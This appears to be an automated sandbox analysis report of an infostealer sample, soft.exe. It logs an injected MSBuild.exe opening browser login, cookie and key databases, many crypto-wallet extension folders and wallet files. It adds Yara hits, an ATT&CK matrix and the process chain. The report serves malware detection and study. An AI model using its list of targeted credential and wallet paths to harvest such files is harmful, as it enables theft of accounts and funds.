Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\DUKNXICOZT

Remote Access Functionality

Source: Yara match File source: 5.2.soft.exe.9e18000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.soft.exe.9f2c000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.soft.exe.a122000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.soft.exe.9f00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.soft.exe.a122000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.soft.exe.9e44000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.1654814559.000000000A112000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1724312184.0000000009F2C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1723674731.0000000009E18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1722279329.0000000009C4D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1724497364.000000000A122000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1723674731.0000000009E44000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1724312184.0000000009F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 4600, type: MEMORYSTR
Source: Yara match File source: 23.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.2274119949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000000D.00000002.2540207459.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2537786569.0000000002AF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ssdtoolbox.exe PID: 2236, type: MEMORYSTR
                            MITRE ATT&CK Matrix (the number in front of a technique is the count of matched signatures for that technique):

                            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                            | Gather Victim Identity Information | 111 Scripting | Valid Accounts | 12 Windows Management Instrumentation | 111 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 14 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
                            | Credentials | Domains | Default Accounts | 4 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 31 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                            | Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 15 Windows Service | 1 Access Token Manipulation | 4 Obfuscated Files or Information | Security Account Manager | 12 File and Directory Discovery | SMB/Windows Admin Shares | 2 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
                            | Employee Names | Virtual Private Server | Local Accounts | 22 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 15 Windows Service | 31 Software Packing | NTDS | 57 System Information Discovery | Distributed Component Object Model | Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                            | Gather Victim Network Information | Server | Cloud Accounts | 2 Service Execution | 1 Bootkit | 312 Process Injection | 1 Timestomp | LSA Secrets | 481 Security Software Discovery | SSH | Keylogging | 125 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                            | Domain Properties | Botnet | Replication Through Removable Media | 2 PowerShell | RC Scripts | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 351 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 351 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                            | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 3 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                            | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 312 Process Injection | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
                            | Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Bootkit | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            Behavior Graph (ID: 1626993, Sample: soft.exe, Start date: 01/03/2025, Architecture: WINDOWS, Score: 100). The graph image is not reproduced here; the process tree recovered from its edges is:

                            • soft.exe
                              • BitLockerToGo.exe
                                • N7LnRW81Rfq.exe
                                  • N7LnRW81Rfq.tmp
                                    • ssdtoolbox.exe
                                • MnzBi21FK.exe
                                  • cmd.exe
                                    • wscript.exe
                                      • powershell.exe
                                        • powershell.exe
                                          • MSBuild.exe
                                        • conhost.exe
                                    • conhost.exe
                            • svchost.exe
                              • MpCmdRun.exe
                                • conhost.exe
                            • svchost.exe
                            • 5 other processes

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.